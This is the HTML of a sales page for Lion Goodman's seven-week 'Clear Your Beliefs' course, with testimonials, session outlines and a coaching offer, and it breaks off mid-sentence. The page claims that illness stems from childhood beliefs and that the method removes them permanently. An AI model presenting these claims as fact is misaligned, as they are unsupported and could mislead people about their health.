<strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong>\r\n\r\n<strong> <span style="color: #000080;">It’s that simple.</span></strong>\r\n\r\n&nbsp;\r\n<h1>Why Beliefs Are Difficult To Change</h1>\r\nMany people agree that, <em>“Your beliefs create your reality,” </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There’s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.\r\n\r\n<strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.\r\n\r\nYour parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn’t know any better. it’s exactly what <em>their parents</em> did to<em> them</em>.\r\n\r\nYou formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."\r\n\r\n&nbsp;\r\n<h1>Why We React The Way We Do</h1>\r\nWhen you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:\r\n\r\n<img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" />\r\n<ul class="indented-img-left">\r\n	<li>Why did I say that?</li>\r\n	<li>What’s wrong with me?</li>\r\n	<li>Why didn’t I follow through?</li>\r\n	<li>Why did I react that way?</li>\r\n	<li>What the hell just happened?</li>\r\n</ul>\r\n<em>\r\n"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.\r\n\r\nThese programs are like mousetraps in your mind’s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.\r\n\r\n<strong>You can change these reactive patterns – if you’re willing to clean out your basement.</strong>\r\n\r\n&nbsp;\r\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\r\n<strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. <strong>Here''s why:</strong>\r\n<ul class="indented">\r\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don’t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\r\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn’t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\r\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\r\n</ul>\r\nMost belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn’t you! The problem is with the method – it was only partially effective!</strong>\r\n\r\n&nbsp;\r\n<h1>Here’s Some Good News</h1>\r\n<ul class="indented">\r\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It’s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\r\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\r\n</ul>\r\nTo get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they’ll pop up later and create the same problem – again and again.\r\n\r\nYou can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.\r\n\r\n&nbsp;\r\n<h1>Imagine The Life You Desire</h1>\r\n<strong>Can you imagine this?</strong>\r\n\r\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\r\n<ul class="indented-img-left">\r\n	<li>You''re no longer held back by old beliefs and stories.</li>\r\n	<li>There''s no resistance to doing what needs to be done.</li>\r\n	<li>You feel joy and positive energy as you move forward to create the life of your dreams.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\r\n<strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong>\r\n\r\n<img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em>\r\n\r\nThose discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.\r\n\r\n<em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong>\r\n\r\n&nbsp;\r\n<h1>Clear Whatever Is In The Way</h1>\r\n<img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don’t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.\r\n\r\n<strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don’t</em> want.</strong>\r\n\r\n&nbsp;\r\n<h1>Is This A Guaranteed Cure-All For What Ails You?</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work. No technique will cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. No free rides.\r\n\r\nIn our ten years of experience using this technique with thousands of clients, we''ve seen that nearly every problem has its source at the causal causal level, down where your beliefs are stored. Itt takes significant effort to clear your deepest beliefs – the ones that got programmed before you could speak.\r\n\r\nThat''s why we offer a <strong>Coaching Option</strong> with our program. Our professionally trained <em>Clear Your Beliefs Coaches</em> can guide you on your journey down to the deepest level of your psyche – a place that''s difficult to get to all by yourself.\r\n\r\n&nbsp;\r\n<h1>The Clear Your Beliefs program can:</h1>\r\n<ul class="indented">\r\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\r\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\r\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\r\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\r\n</ul>\r\n&nbsp;\r\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, we invite all aspects of you – mental, emotional, physical, and spiritual – to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.\r\n\r\nIf you’re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em>\r\n\r\nDuring each class, you’ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You’ll upgrade your health, your work, and your relationships. You’ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.\r\n<div class="icon_box">\r\n<h1>With This Methodology, You Can Finally:</h1>\r\n<ul class="check">\r\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="margin-right: -120px ! important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\r\n	<li>Remove resistance and barriers</li>\r\n	<li>Open doors to new opportunities</li>\r\n	<li>Eliminate pain and suffering from the past</li>\r\n	<li>Experience more fulfillment in your relationships</li>\r\n	<li>Attract more abundance and prosperity</li>\r\n	<li>Increase your energy, vitality, and productivity</li>\r\n</ul>\r\n</div>\r\n<strong>You’ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).\r\n<div class="quot">\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<em>“You helped me resolve in a short time issues in my life that I’ve struggled with for years. In addition, I can use the tools you’ve taught me to deal with any difficult circumstance that may appear in the future.”</em>\r\n<div style="text-align: right;"><strong>– G. J., software developer</strong></div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n</div>\r\n<div class="message_box">\r\n<h1>A Message from Lion Goodman...</h1>\r\nDear Explorer:\r\n\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a>As a child, I believed there was something wrong with me. I didn’t look or feel like the other kids. I didn’t like who I was. I felt separate and alone. I didn’t know how to make it better.\r\n\r\nI was gripped by some of life’s biggest questions: “Who am I? Why am I here? What makes me different? What is life about?"\r\n\r\nI began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the “normal” part never happened!)\r\n\r\nAfter decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.\r\n\r\nI noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it’s possibilities, new opportunities came my way.\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.\r\n\r\nThe belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a “download” – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.\r\n\r\nWhen your closet is crammed full of old outfits you’ll never wear, it’s time for some Spring cleaning!\r\n\r\n<em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong>\r\n\r\nHaving worked with thousands of clients over the past decade, I’ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I’ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven’t touched.\r\n\r\nI am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.\r\n\r\nIf you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.\r\n\r\nA lot of people say, “just change your beliefs...” as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.\r\n\r\nIn the <em>Clear Your Beliefs</em> course, you’ll get guidance from me, through a series of recorded classes. You also have the opportunity to work with a professional <em>Clear Your Beliefs Coach </em>in private sessions. Join me for seven sessions of deep healing and transformation. Clear your old beliefs, and create the life you want.\r\n\r\nThis is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.\r\n\r\nLive the life of your dreams. There’s nothing to stop you – except a few old beliefs... In gratitude, and with warm wishes for your total success,\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\r\n\r\nLion Goodman, Creator of <em>The BeliefCloset Process</em>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Register Today and Discover What''s Possible</h1>\r\nWe are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience. You’ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful technique used by hundreds of coaches and therapists around the world.\r\n\r\nYou can take yourself through the course, or you can go deeper by working one-on-one with a <em>Clear Your Beliefs Coach, </em>who will guide you and answer your questions each week. Our professionally trained coaches are located in cities around the world, and they can work with you in person, by phone, or via Skype.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 1: </span> <strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.In this first session, you’ll examine your old beliefs, and determine which ones no longer serve you. It’s time to discard them and clear some space!You’ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades. You’ll feel more open, empowered and free to choose your beliefs and the way you live your life.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 1, you will:</strong>\r\n<ul>\r\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\r\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\r\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\r\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you’ll grow to love him, as I do.”</em>\r\n<div style="text-align: right;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 2: </span> <strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you’ll focus on issues and problems that have kept you from being happy and joyful.What do you believe about yourself? Your idea of “Who I am” is based on beliefs and programming you got as a child. What messages did your parents, caregivers, and siblings plant in your child brain that still affect you?In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.It’s time to haul them out, and toss them out! You don’t need them anymore. If you hear critical inner voices berating you, don’t miss this session. Rid yourself of those pesky critical voices along with the diapers!\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 2, you will:</strong>\r\n<ul>\r\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\r\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\r\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day.”</em>\r\n<div style="text-align: right;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div style="text-align: right;"></div>\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 3: </span> <strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\r\n\r\nThis isn’t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.<em>What are you capable of? </em> If your answer is “Anything...” you don’t need this session. But most of us think too small...\r\n\r\n</div>\r\n<div class="module_body">Our <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised. We let our negative beliefs stop us.You may hear internal voices say, <em>“What’s the use? You’ll fail anyway. You don’t deserve happiness. Look at you!” </em>We were shamed into thinking that we were less than others. We learned to compare ourselves to others – and we always lose that contest. Clear out any apparent limitations you''ve taken on, and find your true power to create what you want. Do whatever you need to do in order to achieve your vision.</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you’ll eliminate those beliefs and relieve yourself of those symptoms. You’re already a master manifestor – you''re just manifesting your old programs!</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 3, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\r\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you’re partway there.</li>\r\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“Thank you taking me back to the beginning to help me hit the “reset” button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. ”</em>\r\n<div style="text-align: right;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 4: </span> <strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you’ll delete beliefs that interfere with your personal relationships.If you’re married, are you happy and secure? Or are you anxious about the future? If you’re not in a relationship, what’s holding you back from finding your ideal mate?Humans are social creatures – we must relate to others to survive. At our core, we want a security and safety, but we also want passion and romance. You learned “what love is” from your parents – so it’s no wonder that you’re confused! Most of us repeat patterns we learned from our early childhood. We watched our parents interact, and Mom and Dad’s relationship became our model of what a relationship is supposed to look like. Love was contaminated by disdain, contempt, withdrawal, or abuse. We were programmed to repeat their patterns – without conscious choice. This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\r\n\r\n</div>\r\n&nbsp;\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 4, you will:</strong>\r\n<ul>\r\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\r\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\r\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ’belief-outfits’ are perfect for me, and I’m wearing them with joy and enthusiasm!”</em>\r\n<div style="text-align: right;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 5: </span> <strong>Clear Your Old Beliefs About Money and Work</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you’ll focus on money, wealth and abundance – or the lack thereof!\r\n\r\nWhat do you believe about earning a living in today’s economy? Is money really the root of all evil?\r\n\r\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem. Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture. Can you see their influence?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 5, you will:</strong>\r\n<ul>\r\n	<li>Examine your family and cultural beliefs about money, work, poverty and “deservingness.”</li>\r\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\r\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\r\n	<li>Learn why affirmations alone, and the “Law of Attraction,” don’t work, regardless of how diligently you practice them</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs.”</em>\r\n<div style="text-align: right;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 6: </span> <strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you’ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.Ill health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.What do you believe and perceive about your body? Your health? Your age? Your vitality? Your ability to heal? The future of your health?\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 6, you will:</strong>\r\n<ul>\r\n	<li>Identify old beliefs that stand between you and vibrant health</li>\r\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\r\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\r\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before.”</em>\r\n<div style="text-align: right;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h">\r\n<h5><span class="session">Session 7: </span> <strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\r\n</div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through 